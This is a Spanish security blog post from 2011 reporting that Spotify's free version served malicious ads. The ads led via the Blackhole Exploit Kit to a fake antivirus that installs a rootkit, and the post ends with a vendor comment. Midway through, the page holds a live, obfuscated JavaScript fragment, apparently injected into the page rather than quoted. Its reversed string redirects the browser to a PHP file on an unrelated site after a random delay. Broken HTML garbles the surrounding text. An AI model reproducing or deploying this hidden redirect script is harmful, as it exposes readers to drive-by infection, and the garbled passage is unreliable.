Publicidad Maliciosa en el servicio de música Spotify
Spotify, el popular servicio de música, ha estado desplegando anuncios maliciosos a los usuarios de su versión Gratuita. Los anuncios llevan a sitios que utilizan el Blackhole Exploit Kit para infectarlos con una aplicación antivirus falsa de Windows Recovery.
“La publicidad maliciosa (malvertising) no es nada nuevo, pero este caso es un tanto distinto. Normalmente los anuncios maliciosos se muestran como parte de un sitio y se ven con el navegador. En este caso, el anuncio malicioso se despliega de hecho dentro de la aplicación Spotify misma. Esto significa que es suficiente que el anuncio se despliegue ante usted en Spotify para ser infectado, sin ni siquiera dar clic sobre el anuncio. De modo que si abre Spotify pero lo deja funcionando en segundo plano, mientras escucha su música favorita, podría aun así ser infectado”, señaló Patrick Runald, Websense Security Labs.
Una vez que el anuncio se despliega, se conecta a hxxp://uev1.co.cc donde el kit de explotación prueba varias vulnerabilidades, incluyendo una de Adobe Reader/Acrobat para infectar al usuario. La dirección IP donde está hospedado el contenido malicioso es muy conocida y los Websense Security Labs han visto que hospeda el mismo kit de explotación en varios otros dominios.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tosAbril2011/Websense_1.jpg.ashx” alt=”” width=”300″ height=”161″ /><br />
El antivirus falso instala un rootkit, un tipo de software malicioso que es muy difícil de detectar. Esta es una pantalla que muestra cómo aparece la aplicación en la computadora del usuario:</p>
<p><img decoding=)
Fuente
Comentario:
De este “Windows Repair” ya controlamos algunas variantes con el actual ELISTARA. Si les apareciera y no fuera controlado, enviennos muestra para analizar y pasar en controlar en la siguiente version, de las que del ELISTARA hacemos a diario !
saludos
ms, 3-4-2011
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.